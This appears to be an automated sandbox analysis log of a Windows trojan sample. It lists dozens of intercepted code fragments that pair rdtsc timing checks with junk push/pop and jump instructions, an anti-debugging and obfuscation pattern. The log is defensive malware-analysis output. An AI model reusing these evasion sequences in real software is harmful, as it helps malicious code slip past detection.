Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7B7B second address: CF7BAA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F3620DC90F6h 0x00000009 pop edx 0x0000000a jmp 00007F3620DC9101h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3620DC9100h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7BAA second address: CF7BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7D28 second address: CF7D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3620DC9102h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7D40 second address: CF7D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7D44 second address: CF7D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F3620DC90FEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7D5C second address: CF7D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB17F second address: CFB189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3620DC90F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB189 second address: CFB18D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB2A2 second address: CFB2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F3620DC910Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB2CA second address: CFB2EA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F362081F5A5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB2EA second address: CFB2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB2EE second address: CFB2FB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB2FB second address: CFB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jc 00007F3620DC90FEh 0x00000010 je 00007F3620DC90F8h 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 adc dx, CF61h 0x0000001e lea ebx, dword ptr [ebp+1246008Bh] 0x00000024 call 00007F3620DC9105h 0x00000029 add ecx, dword ptr [ebp+122D1D3Bh] 0x0000002f pop ecx 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 push ebx 0x00000033 jmp 00007F3620DC9104h 0x00000038 pop ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB357 second address: CFB35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB35B second address: CFB368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB3E6 second address: CFB3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB3EB second address: CFB46E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3620DC90FCh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F3620DC90F8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a ja 00007F3620DC9108h 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D2941h], eax 0x00000038 call 00007F3620DC90F9h 0x0000003d jbe 00007F3620DC90FAh 0x00000043 push edx 0x00000044 push eax 0x00000045 pop eax 0x00000046 pop edx 0x00000047 push eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F3620DC9105h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB46E second address: CFB477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB477 second address: CFB4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9105h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f js 00007F3620DC9100h 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jnl 00007F3620DC90F6h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push edi 0x00000022 jnp 00007F3620DC90F8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB4BD second address: CFB4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB4C2 second address: CFB51F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a add ecx, dword ptr [ebp+122D2E15h] 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 xor edi, 11E05A51h 0x0000001a mov edi, 19AAD3DAh 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F3620DC90F8h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b mov esi, 31A9A3B8h 0x00000040 push 8E0E82A2h 0x00000045 jp 00007F3620DC9118h 0x0000004b push eax 0x0000004c push edx 0x0000004d jbe 00007F3620DC90F6h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB5B6 second address: CFB64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F59Fh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F362081F5A7h 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 popad 0x00000017 nop 0x00000018 mov si, 3321h 0x0000001c push 00000000h 0x0000001e or dword ptr [ebp+122D228Dh], ecx 0x00000024 push 9E31F3EFh 0x00000029 jmp 00007F362081F59Fh 0x0000002e add dword ptr [esp], 61CE0C91h 0x00000035 mov edi, 79869BC2h 0x0000003a push 00000003h 0x0000003c mov dx, 03A7h 0x00000040 push 00000000h 0x00000042 mov di, B2A6h 0x00000046 push 00000003h 0x00000048 jmp 00007F362081F5A6h 0x0000004d xor esi, dword ptr [ebp+122D2DB1h] 0x00000053 push A7BB5007h 0x00000058 push eax 0x00000059 push edx 0x0000005a jbe 00007F362081F59Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB64F second address: CFB653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1A256 second address: D1A25A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1A9D6 second address: D1A9DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1A9DA second address: D1A9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1A9E6 second address: D1A9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jbe 00007F3620DC90F6h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1A9F5 second address: D1AA01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F362081F596h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1AE56 second address: D1AE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jg 00007F3620DC90F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1AE62 second address: D1AE96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Ah 0x00000007 jmp 00007F362081F59Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F362081F5A6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CEA5F0 second address: CEA5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CEA5F8 second address: CEA60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F59Ah 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1B6DB second address: D1B6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1B6DF second address: D1B6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1B9A3 second address: D1B9BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3620DC90FEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1FE05 second address: D1FE0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1FE0B second address: D1FE30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D22A23 second address: D22A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D22A2E second address: D22A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CDCDDF second address: CDCDE4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27CB1 second address: D27CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D271F3 second address: D27212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F362081F5A6h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27212 second address: D27216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27216 second address: D2721C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2721C second address: D27224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27224 second address: D27258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F362081F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F362081F598h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ebx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop ebx 0x00000019 jmp 00007F362081F5A5h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D277A4 second address: D277A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27945 second address: D27950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27AC5 second address: D27AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9103h 0x00000009 ja 00007F3620DC90F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27AE2 second address: D27AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A569 second address: D2A57A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A57A second address: D2A58F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F362081F598h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A58F second address: D2A593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A593 second address: D2A5A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F362081F596h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A5A1 second address: D2A5A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A5A5 second address: D2A5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F362081F598h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A5B8 second address: D2A5C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC90FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A5C8 second address: D2A645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jmp 00007F362081F5A7h 0x00000015 jmp 00007F362081F5A1h 0x0000001a popad 0x0000001b pop eax 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F362081F598h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 push F2919ED9h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A645 second address: D2A649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A9C1 second address: D2A9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F362081F596h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A9D0 second address: D2A9F6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F3620DC9108h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A9F6 second address: D2A9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A9FC second address: D2AA00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2AB8D second address: D2AB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2AB91 second address: D2AB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2ACB8 second address: D2ACBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2ACBE second address: D2ACC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2B1F3 second address: D2B21E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F362081F5A4h 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F362081F59Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2B517 second address: D2B51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2B6DE second address: D2B6E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2B6E2 second address: D2B6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2B7AD second address: D2B7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2EBE8 second address: D2EBEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D32320 second address: D32326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D32B85 second address: D32BB6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F3620DC90FEh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3620DC9105h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D35072 second address: D35078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
